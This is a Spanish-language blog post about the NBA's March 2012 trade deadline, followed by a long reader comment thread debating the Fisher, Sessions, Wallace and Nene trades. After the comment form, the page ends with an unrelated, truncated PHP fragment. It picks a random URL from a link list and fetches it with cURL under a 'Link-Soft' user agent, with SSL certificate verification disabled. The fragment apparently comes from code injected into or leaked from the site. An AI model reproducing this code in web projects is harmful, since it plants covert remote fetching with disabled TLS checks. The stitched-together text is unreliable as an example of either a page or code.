Especial trade deadline

15 de March de 2012 por MagicJohnson32

El futuro de Dwight Howard ha condicionado enormemente los últimos días antes del cierre del plazo para realizar traspasos en la NBA. Finalmente, tras una inexplicable sucesión de declaraciones y comportamientos, Howard ha pedido perdón y ha firmado los papeles según los cuales renuncia a la opción para convertirse en agente libre este próximo verano. Es decir, que salvo que lo traspasen, seguirá en los Orlando Magic al menos un año más.

En cuanto se ha conocido la noticia el mercado ha empezado a moverse. Tras el ya sabido traspaso entre Bucks y Warriors por Monta Ellis y Andrew Bogut, esto es lo que ha dado de sí el trade deadline:

– Nene se marcha a Washington junto a Ronnie Turiaf, JaVale McGee a los Nuggets y Nick Young aterriza en los Clippers, que dan a Brian Cook y una 2ª ronda a los Wizards.

– En el movimiento más inesperado de la historia de los trade deadlines, los Lakers traspasan a Derek Fisher y una 1ª ronda a Houston a cambio de Jordan Hill.

– Marcus Camby se marcha a Houston a cambio de una 2ª ronda (originalmente de los Wolves), Thabeet y Flynn.

– Los Blazers también traspasan a Gerald Wallace a los Nets, que dan a cambio una primera ronda de 2012 (protegida Top 3), Mehmet Okur y Shawne Williams. Obviamente, los Nets han reaccionado rápido al anuncio de Howard y con este movimiento esperan convencer a Deron Williams de que estará mejor en Brooklyn que en Dallas. Los Blazers, para hacer hueco en la plantilla, cortan a Greg Oden y Chris Johnson.

– Los Spurs traspasan a Richard Jefferson y una 1ª ronda (condicionada) a los Warriors a cambio de Stephen Jackson. S-Jax vuelve a Texas nueve años después de dejar los Spurs.

– Los Pacers se hacen con Leandro Barbosa. Los Raptors reciben una 2ª ronda. Larry Bird buscaba anotación y el brasileño no es Ray Allen pero sin duda puede anotar.

– Los Lakers finalmente consiguen un base. Es Ramon Sessions, que llega de Cleveland junto a Christian Eyenga. Deja L.A. el gran Luke Walton y su contrato de 6 millones, además de Jason Kapono y la 1ª ronda de los Lakers de 2012. Los Cavs obtienen además el derecho a intercambiar la 1ª ronda de 2013 de los Heat por la de los Lakers.

– Sam Young, de los Grizzlies, deja Memphis con destino a Philadelphia. Los Grizzlies reciben los derechos de Ricky Sanchez. Tal vez pensaron que les estaban ofreciendo a Ricky Rubio…

– Los Warriors consiguen una 2ª ronda de los Hawks por cash.

– No es un traspaso, pero Wilson Chandler y los Nuggets negocian un acuerdo para que el alero regrese a Colorado.

– Y los Blazers completan su transformación con el despido de Nate McMillan. Kaleb Canales, además de tener uno de los nombres más ‘cool’ del planeta, pasa de asistente a head coach.

Comenta

145 comentarios a esta entrada

  1. Esteban dice:
    #1

    Bueno sancho, esta bien, lo decia por q habian prometido un refuerzo para pelear por el titulo, y no llego

    Ahora pienso, los lakers sumaron dos espiring de 9 millones en total no? Y hay olor a algo raro con houston, me suena q entre temporadas le aplican la anmistia a metta y traspasan a gasol por un trade exceptiona a houston, asi logran la reeconstruccion de inmediato, tienen espacio para fichar a deron, traer a besley y wallace, no te parece sancho?

      Citar

  2. Esteban dice:
    #2

    Barnes, murthy y kapono tamb terminan contrato, por lo q los lakers con esos movimientos podrian tener a kobe y bynum, con solo 40 mill, es decir 30 para gastar mas la excepcion de nivel medio completa y no estar en el impuesto de lujo

    Ah houston tendra espacio en el tope la prox temporada para fichar a toda la NBA mas o menos

      Citar

  3. Sancho88 dice:
    #3

    Lo de Kapono no hace falta que esperen a que termine contrato, porque también ha sido incluído en el traspaso más fraudulento de la historia junto a Walton y la ronda protegida de los Mavs, a cambio de Sessions y Eyenga. Yo no había visto nada tan fraudulento jamás. Sobre los planes de futuro, está claro que lo de Houston y Pau pinta bien, me refiero a que es bastante evidente que acabará allí. También se ha hablado, aunque es poco probable, que en verano le apliquen el buy-out a Fisher y vuelva a firmar por Lakers… pero esto no me lo creo, que volviera la última vez de los Jazz, vale, pero a la edad que tiene Fisher, y con el pensamiento de retirada que él mismo ha manifestado… muy difícil. Amnistía a Artest para liberar espacio? puede, depende de qué puedan conseguir por Pau. Lógicamente, el movimiento que debería hacer Lakers, según mi criterio, más allá de ir a por Deron, sería ir a por Kevin Love, un tío que no va a cobrar tanto, y que te aporta el 4 abierto que necesita el equipo, debido al esquema de Brown. Luego, lo de Sheed yo no lo veo, no creo que vuelva a jugar… La clave es si Minnesota aceptaría el contrato de Pau, porque saldrían claramente perdiendo, además parece que él ha prometido quedarse allí algunos años… No sé qué pasará, lo que está claro es que hoy se le ha favorecido a los Lakers, no sé bajo qué intereses, pues los Cavs pierden a un jugadorazo a cambio de dos cachos de carne y una ronda que no promete mucho, pero aislando el olor a fraudulento del traspaso, parece que habrá reconstrucción en torno a Bryant y Bynum. Artest y Pau no creo que se queden, y sí, lo de Beasley también lo veo claro

      Citar

  4. Esteban dice:
    #4

    Cierto entre tantos cambios me comi lo de kapono, de wallace me referia a gerald wallace q acaba contrato este año
    Estas sancho con lo de love desde el otro dia, de mi parte creo q no hay la minima chance q minesota lo traspase hasta q llegue a la misma situacion de howard, tengo debilidad por pau, a principio de temporada un cambio mano a mano quiza se podria haber hecho, ahora me parece imposible, con los progresos de love, su bajo contrato, y su edad, creo q es el jugador mas intransferible de la NBA

      Citar

  5. Sancho88 dice:
    #5

    Por cierto, escribí mal una cosa que quería decir, no era Pau quien había dicho que se iba a quedar unos años en Minnesota, evidentemente, sino Kevin Love. Así que sí, tienes razón Esteban. Es imposible que suceda ese traspaso. Luego, los Wolves tienen que construir su juego exterior. Beasley no seguirá el año que viene, eso parece bastante claro. Liberará más de 6 millones, más los 3 de Anthony Randolph, y muchos hablan del interés por Jeff Green. Supongo que tendrá que tener 100% garantías de estar sano de su dolencia cardíaca, porque si no no creo que nadie firme a este agente libre. Pero en buenas condiciones, le podría aportar grandes cosas a los Wolves. También supongo que no ejercerán la opción de equipo sobre Brad Miller y Martell Webster. Serían 11 millones más para invertir, quién sabe si en Jamal Crawford, quizá. Y yo también buscaría un traspaso por Ridnour, que les podría venir bien a equipos como los Pacers, Bucks, incluso a mis Kings… como base suplente es bastante competente. Con Rubio y Ellington, más Barea de combo guard, me parece una buena dirección para el equipo. O si no se traspasa a Ridnour, que traspasen a Barea, pero quedarse con los dos creo que sería un fallo

      Citar

  6. Denise dice:
    #6

    @esteban; Perdedores del Deadline los Magic??

    Mantienen a Howard hasta la 2013, y ahora no te quepa la menor duda de que en verano y en el proximo Deadline iran a por todas a construirle un equipazo a Howard para que se sienta a gusto y renueve. Y al contrario de lo que leí por arriba, si que tienen muchos activos para traspasar. Los movimientos que yo haría:
    1- Renovar a Ryan Anderson
    2- Fichar a Steve Nash o Ray Allen por la mid-level
    3- Enviar a Turkoglu a un destino poco apetecible por 2-3 jugadores, aunque sean malos, pero que le de profundidad al equipo. Digo lo de poco apetecible, porque sería expiring de 11 kilos el año que viene aunque tiene opción él a prorrogar por otro año. Por lo que si lo envias a un destino poco apetecible, ese equipo probablemnte se beneficie ya que Hedo no ejecutará ese año opcional y será expiring.
    4 – Buscar a un equipo desesperado por cms y empaquetarle a Glen Davis por un buen jugador. Glen Davis no es tan malo como aparenta en Orlando, pero está a la sombra de Howard.
    5- Si es posible Redick y Nelson (expiring de 13 kilos) por Monta Ellis, cuya asociación con Jennings en Bucks creo que va a ser nefasta.

      Citar

  7. TheDeerHunter dice:
    #7

    Fisher no se merece esto. 🙁

      Citar

  8. nba dice:
    #8

    Denise: Si, pero…me parece tener muy poca clase con un tio que lleva mas de una decada en tu equipo y ha ganado 5 anillos y probablemente se retirase esta temporada, que mas le daba a los Lakers haberlo aguantado ya hasta final de temporada.
    Ademas, que en lo deportivo, tampoco supone una mejora, Jordan Hill no viene mal, pero tampoco es muy bueno.

    Jugada muy sucia de Lakers y me gustaria saber las opiniones de los angelinos de aqui (deer, magicjohnson) y otros mas sobre este asunto.

    Evidentemente como seguidor Laker, la jugada con Fisher es una pena, pero el businnes es el bussinnes , lo malo que ahora no queda nadie en la plantilla con mas galones que Fisher , por lo que probablemente ahora entre Pau y Bynum, tendrar que reclamar su protagonismo.
    A final de temporada estoy casi seguro de que Pau sera traspado a Rockets, porque es el siguiente paso en Lakers, primero intentar sacar algo positivo esta temporada, despues liberal espacio salarial en verano

      Citar

  9. melo15 dice:
    #9

    Sin duda los Magic han sido los ganadores, pero si Howard les ha hecho un favor, y ha extendido su contrato, ahora el GM de lo Magic ha de responder y hacerle un equipazo, el juego interior esta bastante bien, por lo tanto yo ficharia a D.J Aungustin, que creo que caba contrato, y un escolta de calidad, a Reddick lo mantendria, podria ser un buen microondas, y en el puesto de alero con Turkoglu no se puede hacer nada.
    Tendreis el articulo a las 5 de la tarde. Top-15 en el draft, con apartado especial para los Kings XD

      Citar

  10. Denise dice:
    #10

    melo15: Sin duda los Magic han sido los ganadores, pero si Howard les ha hecho un favor, y ha extendido su contrato, ahora el GM de lo Magic ha de responder y hacerle un equipazo, el juego interior esta bastante bien, por lo tanto yo ficharia a D.J Aungustin, que creo que caba contrato, y un escolta de calidad, a Reddick lo mantendria, podria ser un buen microondas, y en el puesto de alero con Turkoglu no se puede hacer nada.Tendreis el articulo a las 5 de la tarde. Top-15 en el draft, con apartado especial para los Kings XD

    Tio, Melo, o te has mutado, o antes nos estabas vacilando con esas faltas de ortografia, ese vocabulario y esas preguntas inocentes que hacias.

      Citar

  11. AndiD dice:
    #11

    Bravo por melo!! A lo mejor todo el cambio se debe a que ya es melo16 🙂

    Sobre el trapaso de Sessions a LA que tanto se ha criticado por aquí por ser fraudulento… yo también lo veí así al principio, pero también se podría decir que el de Wallace a Nets es fraudulento (Okur???). Sessions no iba a tener nada de tiempo en Cleveland si Irving sigue con esta progresión (apunta a pedazo de jugador, por cierto).

    Y lo siento Denise, pero a Magic yo tampoco los veo ganadores (aunque tampoco perdedores). Sólo has retrasado “The decission 2” unos meses y no te has hecho con nada para intentar convencerle un poco más.

    Coincido con Esteban en que el pájar de Larry Bird siempre tiene pequeños ases en la manga.

    Y el mejor trade para mi ha sido el de Clippers, que se desprenden de B.Cook, que con K.Martin ya no jugaba casi nada, y consiguen a un SG que va a meter sus puntos. Me parece genial. GM del año!!

      Citar

  12. Txusma dice:
    #12

    melo15:
    Sin duda los Magic han sido los ganadores, pero si Howard les ha hecho un favor, y ha extendido su contrato, ahora el GM de lo Magic ha de responder y hacerle un equipazo, el juego interior esta bastante bien, por lo tanto yo ficharia a D.J Aungustin, que creo que caba contrato, y un escolta de calidad, a Reddick lo mantendria, podria ser un buen microondas, y en el puesto de alero con Turkoglu no se puede hacer nada.
    Tendreis el articulo a las 5 de la tarde. Top-15 en el draft, con apartado especial para los Kings XD

    Perfecto! Ya tenemos encargado para mantener nuestro particular mock draft!!

      Citar

  13. Denise dice:
    #13

    AndiD: Bravo por melo!! A lo mejor todo el cambio se debe a que ya es melo16 Sobre el trapaso de Sessions a LA que tanto se ha criticado por aquí por ser fraudulento… yo también lo veí así al principio, pero también se podría decir que el de Wallace a Nets es fraudulento (Okur???). Sessions no iba a tener nada de tiempo en Cleveland si Irving sigue con esta progresión (apunta a pedazo de jugador, por cierto).Y lo siento Denise, pero a Magic yo tampoco los veo ganadores (aunque tampoco perdedores). Sólo has retrasado “The decission 2? unos meses y no te has hecho con nada para intentar convencerle un poco más.Coincido con Esteban en que el pájar de Larry Bird siempre tiene pequeños ases en la manga.Y el mejor trade para mi ha sido el de Clippers, que se desprenden de B.Cook, que con K.Martin ya no jugaba casi nada, y consiguen a un SG que va a meter sus puntos. Me parece genial. GM del año!!

    Yo no he dicho que sean ganadores, simplemente se han quedado igual que estaban. Ya habrá tiempo en verano de intentar rodear mejor a Howard, cosa que no será facil porque para empezar Howard tampoco está tan mal rodeado y el listón está alto, y segundo, se tienen que hacer muchas maniobras ahí ya que no hay espacio salarial.

    Lo de Sessions es fraudulento. Si quieren expirings, que se esperen a final de temporada que Sessions era expiring, o haberlo cambiado por un expiring que te pueda ayudar en lo que queda de campaña, no por el batato de Walton que ni siquiera es expiring esta temporada.

    Yo lo que veo es que en estos trades sospechosos, hay muchos favores y chanchullos entre directivos que nunca saldrán a la luz. Y los beneficiados, casi siempre son los mismos.

      Citar

  14. simon dice:
    #14

    yo sigo viendo un problema bastante importante a la hora de remozar el equipo por parte de los Magic todos sus jugadores a excepcion de Nelson y reddick que terminan contrato para el verano 2013 el resto son contratos largos , altos y de gente mayor… y colocar eso por algo decente va a ser muy muy complicado, Turkoglu va a utilizar su player option aunque esté en el mismisimo infierno, 12 millones al nivel actual que esta ofreciendo no se lo van a ofrecer ni en un contrato de 4 temporadas… Glen Davis 4 años a mas de 6.5 por temporada casi imposible de colocar ( por algo mejor digo ), J- Richardson y Duhon 4 y 3 años de contrato a cifras altas para sus aportaciones… no se no se… complicado lo veo reconstruir con este equipo en el plazo de un año. No me gustaría ver a Nash malgastando su ultimo año en Magic, pq ni con Nash Magic va a ganar el anillo con la plantilla actual y la verdad, puestos a ir a un equipo sin opciones de anillo, preferiria ver a Nash en lugares mas romanticos… ( por ejemplo, seguir en Phoenix, el equipo al que ha dado sus mejores años, volver a Dallas con su socio Nowitzki o ir a su “casa” en Toronto )

      Citar

  15. MagicJohnson32 dice:
    #15

    Sancho88:
    Lo de Kapono no hace falta que esperen a que termine contrato, porque también ha sido incluído en el traspaso más fraudulento de la historia junto a Walton y la ronda protegida de los Mavs, a cambio de Sessions y Eyenga. Yo no había visto nada tan fraudulento jamás.

    Pues no te entiendo. Sessions se iba este verano, porque los Cavs ni lo quieren ni lo necesitan, y lo único que buscan desde hace tiempo son rondas para este draft, y se han juntado con dos primeras (la ronda de los Mavs no es protegida) y dos segundas. Hay equipos que han dado mucho más a cambio de rondas. A los Cavs no les importa el contrato de Walton porque no pagan impuesto de lujo y este año liberan los 15 kilos de Jamison. El año que viene liberarán los 15 de Baron Davis y los 6 de Walton. Vamos, que el trade para los Cavs es perfecto, y para los Lakers es muy bueno. De eso se trata en los trades, de que tengan sentido para ambas partes, y en este caso lo tiene.

    Eyenga, que lo dices como si fuese un buen jugador, es de lo peor de la NBA. Directo a la D-League.

      Citar

  16. melo15 dice:
    #16

    Pues claro que los Magic son ganadores, tienen un año mas para rodear a Howard.

      Citar

  17. max dice:
    #17

    Una duda. ¿Existe la posibilidad de que los Rockets ofrezcan a Fisher el boy out (tiene una player option de 3,4M) y éste vuelva a LAL?¿Podrian los Lakers recuperarle de alguna manera, al estilo de lo hizo el año pasado Miami con Ilgauskas?

      Citar

  18. Nacho dice:
    #18

    Me entristece lo de Fisher. Aunque si pienso bien, igual es el último servicio del jugador a la franquicia. Espero que no echemos de menos sus tiros en PO.
    Pau tiene toda la pinta de que se va. Si de por sí es un tipo con hambre, espero que demuestre más de lo que muchos esperan, y se coma lo que hay que comerse para llegar al anillo. Entre sus ganas, y que sobre todo Brown entienda su juego, están las posibilidades de los Lakers. Y ojo, que no me refiero a que suba en puntos y rebotes, eso no es necesario (bueno, no tanto), sino a su visión del juego y de lo que hay que hacer. Parece que Bryant algo se ha mimetizado en estos últimos partidos. INTANGIBLES DAIMIEL, INTANGIBLES… (Cómo hubiera disfrutado con esto el gran Montes)

      Citar

  19. simon dice:
    #19

    MagicJohnson32: Pues no te entiendo. Sessions se iba este verano, porque los Cavs ni lo quieren ni lo necesitan, y lo único que buscan desde hace tiempo son rondas para este draft, y se han juntado con dos primeras (la ronda de los Mavs no es protegida)

    Eyenga, que lo dices como si fuese un buen jugador, es de lo peor de la NBA. Directo a la D-League.

    La ronda de los Mavs si es protegida top 20 hasta 2017 que es unprotected.
    en lo de Eyenga de acuerdo y en lo que dices del traspaso a mi me parece justo, a los cavs les hace falta contratos medio-altos al menos un par de temporadas para llegar al gasto minimo mientras el equipo crece y si este año pescan un par de buenos rookies con un par de retoques en dos o tres años pueden estar bien asentados en PO e ir creciendo para optar por el anillo. Con Session no iban a ningun sitio, pues no lo necesitan y con una ronda del draft lo mismo les sale rana, pero la reconstruciones se basan en eso, hacer espacio para fichar FA y cambiar jugadores que no te interesan y podrían valer mucho para otros equipos y hacerse con rondas de draft.

      Citar

  20. MagicJohnson32 dice:
    #20

    simon: La ronda de los Mavs si es protegida top 20 hasta 2017 que es unprotected.
    en lo de Eyenga de acuerdo y en lo que dices del traspaso a mi me parece justo, a los cavs les hace falta contratos medio-altos al menos un par de temporadas para llegar al gasto minimo mientras el equipo crece y si este año pescan un par de buenos rookies con un par de retoques en dos o tres años pueden estar bien asentados en PO e ir creciendo para optar por el anillo. Con Session no iban a ningun sitio, pues no lo necesitan y con una ronda del draft lo mismo les sale rana, pero la reconstruciones se basan en eso, hacer espacio para fichar FA y cambiar jugadores que no te interesan y podrían valer mucho para otros equipos y hacerse con rondas de draft.

    Perdón, quería decir que no es la ronda de los Mavs la que va en el traspaso de Sessions. Ésa es la que va a Houston junto a Fisher. La que reciben los Cavs es la primera ronda de los Lakers de 2012, obviamente no protegida.

    Por lo demás, estamos de acuerdo 😉

      Citar

  21. Denise dice:
    #21

    MagicJohnson32: Pues no te entiendo. Sessions se iba este verano, porque los Cavs ni lo quieren ni lo necesitan, y lo único que buscan desde hace tiempo son rondas para este draft, y se han juntado con dos primeras (la ronda de los Mavs no es protegida) y dos segundas. Hay equipos que han dado mucho más a cambio de rondas. A los Cavs no les importa el contrato de Walton porque no pagan impuesto de lujo y este año liberan los 15 kilos de Jamison. El año que viene liberarán los 15 de Baron Davis y los 6 de Walton. Vamos, que el trade para los Cavs es perfecto, y para los Lakers es muy bueno. De eso se trata en los trades, de que tengan sentido para ambas partes, y en este caso lo tiene.Eyenga, que lo dices como si fuese un buen jugador, es de lo peor de la NBA. Directo a la D-League.

    Y no crees que habia formas mas idoneas de hacerse con rondas que asumir el contratazo de ese mameluco?? Algun favorcillo se deberían entre ambas franquicias (o se deberan en un futuro)

      Citar

  22. MagicJohnson32 dice:
    #22

    Denise: Y no crees que habia formas mas idoneas de hacerse con rondas que asumir el contratazo de ese mameluco?? Algun favorcillo se deberían entre ambas franquicias (o se deberan en un futuro)

    Un contrato de un solo año para una franquicia en reconstrucción no es nada. ¿Tú sabes lo caras que van las primeras rondas este año y lo que supone para los Cavs disponer de dos en lugar de una?

    Y oye, que estamos hablando de Sessions, que es un buen jugador pero no es Deron Williams… (y es un buen jugador al que no querían en Cleveland).

    Has de intentar hacer la lectura desde el punto de vista de los Cavs: consigue una primera ronda a cambio de un suplente que se iba este verano. Los demás detalles del traspaso para ellos son absolutamente intrascendentes.

      Citar

  23. Blade Petrovic dice:
    #23

    Yo cioncido con Melo y los magic son los grandes ganadores.Si consiguen un robo en el Draft, y buenos jugadores.
    Yo ficharia a Ray Allen por la Mid-Level y a Augustine y si no consigo a Augustine intento hacer un intercambio de bases con Nelson y hecho a Reddick que me parece un paquete y sobre todo a Turkoglu que a algún equipo como a los Warriors se lo puedes colar o si no no se si los salarios cuadran lo cambio por Kaman y meto a Howard de Ala-pivot.
    Con un quinteto Augustine-Allen-Anderson-Howard-Kaman me parece que son un equipo de semifinal de conferencia mínimo.

      Citar

  24. The wolf dice:
    #24

    melo15:
    Pues claro que los Magic son ganadores, tienen un año mas para rodear a Howard.

    pues a mi me parece que howard con la renovacion solo hace que los magics tengan unos meses mas para buscar un traspaso mas atractivo…al menos eso pienso…vamos que antes de 2013 o a principio de 2014 a mas tardar esta marchandose de orlando

      Citar

  25. simon dice:
    #25

    Denise: Y no crees que habia formas mas idoneas de hacerse con rondas que asumir el contratazo de ese mameluco?? Algun favorcillo se deberían entre ambas franquicias (o se deberan en un futuro)

    Denise macho tienes que mirar todas las cosas en los trades;
    1 – Cavs está en reconstruccion, punto numero 1.
    2- fijate en los salarios que tienen comprometidos los Cavs para la temporada que viene, y fijate que en la NBA igual que hay un gasto máximo hay un gasto minimo, y con lo salarios que tienen no llegan a ese gasto minimo por lo tanto los Cavs también necesitan contratos medio-altos para llegar a ese minimo. y este tio le quedan este y otro año de contrato que terminara cuando los Cavs tengan que empezar a asumir renovaciones mas altas si quieren ir aspirando a subir puestos en la conferencia. es decir para Cavs es mucho mas valioso un expiring para dentro de un año o dos que para este mismo verano en el cual se deben concentrar en sacarle el jugo al Draft. Imaginate que pueden pescar en el draft con la eleccion 7-8 que es la que van a tener ( a expensas del sorteo )

      Citar

  26. simon dice:
    #26

    simon: Imaginate que pueden pescar en el draft con la eleccion 7-8 que es la que van a tener ( a expensas del sorteo )

    Cito pq he mandado el comentario sin terimnarlo:
    …Imaginate que pueden pescar en el draft con la eleccion 7-8 que es la que van a tener ( a expensas del sorteo ) un buen alero o pivot sobre el que reconstruir junto a Irving y con la eleccion de Lakers sacar algun especialista y el equipo sigue creciendo y se mete a PO el año que viene y con buenas sensaciones, imaginate toda la pasta para gastar que van a tener dentro de dos o 3 veranos que será cuando tengan que empezar a aspirar a cosas, de momento le interesan jovenes y/o contratos a expirar dentro de 1 o 2 años. Walton es un paquete vale, pero también es un jugador muy inteligente y con bastante experiencia y eso puede ayudar mucho también a sus jovenes

      Citar

  27. melo15 dice:
    #27

    Howard de ala-Pivot??? En la vida, antes kaman que es mas vesaril y tiene tiro de media distancia

      Citar

  28. Denise dice:
    #28

    Yo lo de la ronda no lo veo mal, y tendrá su valor en el futuro, pero hay formas mejores de conseguir una ronda, que quedandose con un paquetorro de 6 kilos para el año que viene.
    Lo que pasa es que lo veis con la perspectiva Lakers porque sois de ese equipo

    Me pregunto…que hubieseis opinado si los Heat traspasan a los Rockets (que tambien estan aligerando el espacio salarial) a Joel Anthony y una ronda de Draft por Samuel Dalembert….Los que veis con buenos ojos el trade Lak-Cavs os hubieseis echado las manos a la cabeza pidiendo un Sternato!!

      Citar

  29. Jose Luis dice:
    #29

    Y dale Denise jajajaja. Esto es como lo de no amnistiar (aún) a Lewis, Cavs quiere minutos para sus jugadores, y necesita contratos altos para llegar al mínimo. Vale, tu puedes decirme que Crawford cobra casi lo mismo y aportaría más, pero Cavs quiere desarrollar a sus jóvenes en estos años, no que los veteranos les quiten minutos. Y si tienes a Crawford jugando 10-15 minutos se te rebela, más vale tener a Walton y que jueguen los jóvenes. Cavs tiene 4 rondas para este draft que se presupone bastante bueno, a mi parecer lo han hecho muy bien vamos.

      Citar

  30. Jose Luis dice:
    #30

    Pero es que Cavs no está aligerando espacio salarial, es que Cavs está cogiendo un contrato “grande” y “largo”, todo lo contrario de los Rockets.

      Citar

  31. Jose Luis dice:
    #31

    Además Dalembert cobra 7 y Anthony 3’7, y encima tiene un contrato muy largo… ese ejemplo no me vale Denise, es todo lo contrario.

      Citar

  32. Jose Luis dice:
    #32

      Citar

  33. Jose Luis dice:
    #33

    No podría volver a los Lakers, ¿qué equipo podría estar interesado en Fisher? ¿O será, como han dicho ahí arriba, su último servicio a la franquicia, y se quedará como espectador en el Staples?

      Citar

  34. Nacho dice:
    #34

    Blade Petrovic: Yo cioncido con Melo y los magic son los grandes ganadores.Si consiguen un robo en el Draft, y buenos jugadores.Yo ficharia a Ray Allen por la Mid-Level y a Augustine y si no consigo a Augustine intento hacer un intercambio de bases con Nelson y hecho a Reddick que me parece un paquete y sobre todo a Turkoglu que a algún equipo como a los Warriors se lo puedes colar o si no no se si los salarios cuadran lo cambio por Kaman y meto a Howard de Ala-pivot.Con un quinteto Augustine-Allen-Anderson-Howard-Kaman me parece que son un equipo de semifinal de conferencia mínimo.

    Macho, que ya son equipo de semis de conferencia. Que a día de hoy son el 5º de la NBA. Yo no sé por qué, pero me parecen los peor tratados en casi todos lados, y a día de hoy han demostrado que pueden pelear con Bulls y Heat por la final de conferencia. lo que necesitan son dos puntales para cerrar el equipo, no remodelarlo entero. Y Kaman ¿para qué?

      Citar

  35. Denise dice:
    #35

    Nacho: Macho, que ya son equipo de semis de conferencia. Que a día de hoy son el 5º de la NBA. Yo no sé por qué, pero me parecen los peor tratados en casi todos lados, y a día de hoy han demostrado que pueden pelear con Bulls y Heat por la final de conferencia. lo que necesitan son dos puntales para cerrar el equipo, no remodelarlo entero. Y Kaman ¿para qué?

    Todo lo que Orlando necesita es un exterior anotador. Yo cada vez tengo mas claro que los Magic van a ir a por Monta Ellis, sino en verano, en el proximo Deadline.
    Monta es expiring en 2013 con opcion a ejecutar la player option para la 2014, pero Monta no va a renovar por Milwaukee ni de coña, por lo que Orlando intentará traspasar a Nelson y a Redick (ambos expiring de 13 kilos el curso que viene) por Monta.
    Ya lo vereis.

      Citar

  36. Nacho dice:
    #36

    Monta Ellis no iría nada mal. Un cambio de base, pero si es para traer alguien de nivel tipo Ricky, que acelere el juego (si ya tienes anotador) Y ya puestos a pedir un cuatro porque deben de estar echando de menos a Bass. Anderson está rindiendo bien, pero toca renovación (creo) pronto. A ver si se lo cuelan a lakers en verano por Pau. Soñar es gratis.
    Por otro lado, ¿se lo pensaría Deron en verano?

      Citar

  37. Denise dice:
    #37

    Deron dice que se convierte en agente libre. Jarro de agua fria para Prokhorov y sus malditos Nets.Apuesto a que acaba en Dallas

      Citar

  38. Denise dice:
    #38

    Nacho:
    A ver si se lo cuelan a lakers en verano por Pau. Soñar es gratis.

    Un destino que me gustaría para Pau serían los Pacers. Estos ofrecerian a David West, algo de morralla y rondas de Draft (ya que Magicjohnson dice que quieren aligerar espacio salarial)
    Granger+Hibbert+Pau con Paul George, Collison y George Hill suena pero que muy bien como base para construir un equipo ganador.

      Citar

  39. MagicJohnson32 dice:
    #39

    Los Rockets han cortado a Terrence Williams. Qué desperdicio de talento lo de este chico…

      Citar

  40. Txusma dice:
    #40

    MagicJohnson32:
    Los Rockets han cortado a Terrence Williams. Qué desperdicio de talento lo de este chico…

    Mira que jugó un buen primer año en los Nes.

      Citar

  41. Sancho88 dice:
    #41

    MagicJohnson32: Pues no te entiendo. Sessions se iba este verano, porque los Cavs ni lo quieren ni lo necesitan, y lo único que buscan desde hace tiempo son rondas para este draft, y se han juntado con dos primeras (la ronda de los Mavs no es protegida) y dos segundas. Hay equipos que han dado mucho más a cambio de rondas. A los Cavs no les importa el contrato de Walton porque no pagan impuesto de lujo y este año liberan los 15 kilos de Jamison. El año que viene liberarán los 15 de Baron Davis y los 6 de Walton. Vamos, que el trade para los Cavs es perfecto, y para los Lakers es muy bueno. De eso se trata en los trades, de que tengan sentido para ambas partes, y en este caso lo tiene.

    Eyenga, que lo dices como si fuese un buen jugador, es de lo peor de la NBA. Directo a la D-League.

    En los primeros comentarios de este post, pongo que Eyenga y Hill no tienen nivel para jugar en la NBA. En ningún momento he puesto que fuera un buen jugador, solo lo he puesto porque ha sido incluido en ese trade. A mí me parece una mierda por lo qeu te comento de Kapono y Walton, vamos, es que ni regalados. Y a mí Sessions si me parece un buen base suplente de Irving… O sea, un tipo que va a ser titular en un equipo aspirante al título, según tú no tiene sitio en los Cavs? Awesome

      Citar

  42. Jose Luis dice:
    #42

    Creo que leí que salarialmente para Deron Williams era mejor salirse de su último año y firmar un nuevo contrato, así que él de ninguna manera iba a ejercer esa opción de jugador.

      Citar

  43. Jose Luis dice:
    #43

    Llevaba tiempo esperando esto:

    http://espndeportes.espn.go.com/news/story?id=1484839&s=bas&type=column

    Lo pongo también en la entrada del finde para que quede visible 🙂

      Citar

  44. Denise dice:
    #44

    Jose Luis:
    Llevaba tiempo esperando esto:

    http://espndeportes.espn.go.com/news/story?id=1484839&s=bas&type=column

    Lo pongo también en la entrada del finde para que quede visible

    Tiene toda la razón el artículo, y opina los mismo que yo cuando diga que los Warriors se han cubierto de gloria con sus lamentables traspasos y lo de los malditos Cavs es inexplicable. Me parece muy bien que quieran una ronda, pero había mejores formas de conseguirlo que estar pagandole al mameluco de Walton 6 kilos hasta 2013. Ese trade solo lo entiendes si eres de Lakers. Deberia haber sido vetado.

      Citar

  45. Denise dice:
    #45

    Tiene toda la razón el artículo, y opina los mismo que yo cuando diga que los Warriors se han cubierto de gloria con sus lamentables traspasos y lo de los malditos Cavs es inexplicable. Me parece muy bien que quieran una ronda, pero había mejores formas de conseguirlo que estar pagandole al mameluco de Walton 6 kilos hasta 2013. Ese trade solo lo entiendes si eres de Lakers. Deberia haber sido vetado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>